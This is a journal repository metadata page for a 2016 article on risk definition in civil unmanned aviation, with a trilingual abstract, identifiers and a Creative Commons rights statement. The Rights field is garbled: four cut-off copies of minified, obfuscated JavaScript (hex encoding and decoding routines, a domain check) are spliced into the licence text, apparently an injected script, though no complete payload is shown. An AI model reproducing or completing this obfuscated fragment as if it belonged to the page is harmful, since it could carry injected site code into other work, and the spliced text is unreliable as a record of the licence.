Record Details

RISK DEFINITION IN CIVIL UNMANNED AVIATION

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title RISK DEFINITION IN CIVIL UNMANNED AVIATION
Определение рисков в гражданской беспилотной авиации
Визначення ризиків в цивільній безпілотній авіації
 
Creator Kharchenko, Volodymyr; National Aviation University
Мatiychyk, Denys; National Aviation University
 
Subject
air transport system; factors of aviation accidents; risks in civil aviation; unmanned aerial vehicle
65.011.3:629.7.014-519 (045)

авиационная транспортная система; беспилотное воздушное судно; риски в гражданской авиации; факторы авиационных происшествий
65.011.3:629.7.014-519 (045)

авіаційна транспортна система; безпілотне повітряне судно; ризики в цивільній авіації; фактори авіаційних подій
65.011.3:629.7.014-519 (045)
 
Description Objective: The risks in unmanned civil aviation are considered as one of the most important. In the article is proved applicability of ensuring the flight safety of aircraft and considered the basic risks of manned civil aviation. Methods: Analyzed statistical data on aviation accidents, organized probabilities distribution of aviation accidents for manned and unmanned civil aviation to identify factors that influence the occurrence of emergency situations in manned and unmanned aviation. Results: We proposed typology of risk components in civil aviation and systematized methods and techniques to reduce risks. Over the analogies defined possible risks, their causes and remedies in civil unmanned aircraft. Weight coefficients distribution was justified between risk types for development of recommendations on risk management in unmanned civil aviation. Discussion: We found that the most probable risk in manned civil aviation is the human factor, organization of air traffic control, design flaws of unmanned aviation system as a whole, as well as maintenance of unmanned aviation system.
Цель: Риски в беспилотной авиации гражданского назначения рассматриваются как одни из важнейших. В статье обоснована актуальность вопрос обеспечения безопасности полетов воздушных судов и рассмотрены основные риски в пилотируемой гражданской авиации. Методы: Проведен анализ данных об авиационных происшествиях и проведено распределение вероятностей возникновения авиационных происшествий для пилотируемой и беспилотной гражданской авиации с целью выявления факторов, влияющих на возникновение внештатных ситуаций в пилотируемой и беспилотной авиации. Результаты: Предложена типология составляющих рисков в гражданской авиации, систематизированы способы и приемы снижения рисков. На основе аналогий определены вероятные риски, причины их возникновения и пути преодоления в гражданской беспилотной авиации. Обоснованно распределение весовых коэффициентов между типами рисков для формирования рекомендаций по управлению рисками в беспилотной гражданской авиации. Обсуждение: Установлено, что наиболее вероятными рисками в пилотируемой гражданской авиации является человеческий фактор, организация управления воздушным движением, недалеко конструкции бесплотной авиационной системы в целом, а также обслуживание бесплотной авиационной системы.
Мета: Ризики у безпілотній авіації цивільного призначення розглядаються як одні із найважливіших. У статті обґрунтовано актуальність питання забезпечення безпеки польотів повітряних суден та розглянуто основні ризики в пілотованій цивільній авіації. Методи: Проведено аналіз даних про авіаційні події та проведено розподіл ймовірностей виникнення авіаційних подій для пілотованої та безпілотної цивільної авіації з метою виявлення факторів, які впливають на виникнення позаштатних ситуацій у пілотованій і безпілотній авіації. Результати: Запропоновано типологію складових ризиків у цивільній авіації, систематизовано способи та прийоми зниження ризиків. На основі аналогій визначено ймовірні ризики, причини їх виникнення та шляхи подолання в цивільній безпілотній авіації. Обґрунтовано розподіл вагових коефіцієнтів між типами ризиків задля формування рекомендацій з управління ризиками у безпілотній цивільній авіації. Обговорення: Встановлено, що найбільш ймовірними ризиками у пілотованій цивільній авіації є людський фактор, організація управління повітряним рухом, недоліки конструкції безплотної авіаційної системи в цілому, а також обслуговування безплотної авіаційної системи.
 
Publisher National Aviation University
 
Contributor


 
Date 2016-12-22
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11049
10.18372/2306-1472.69.11049
 
Source Proceedings of the National Aviation University; Том 69, № 4 (2016); 14-19
Вестник Национального авиационного университета; Том 69, № 4 (2016); 14-19
Вісник Національного Авіаційного Університету; Том 69, № 4 (2016); 14-19
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ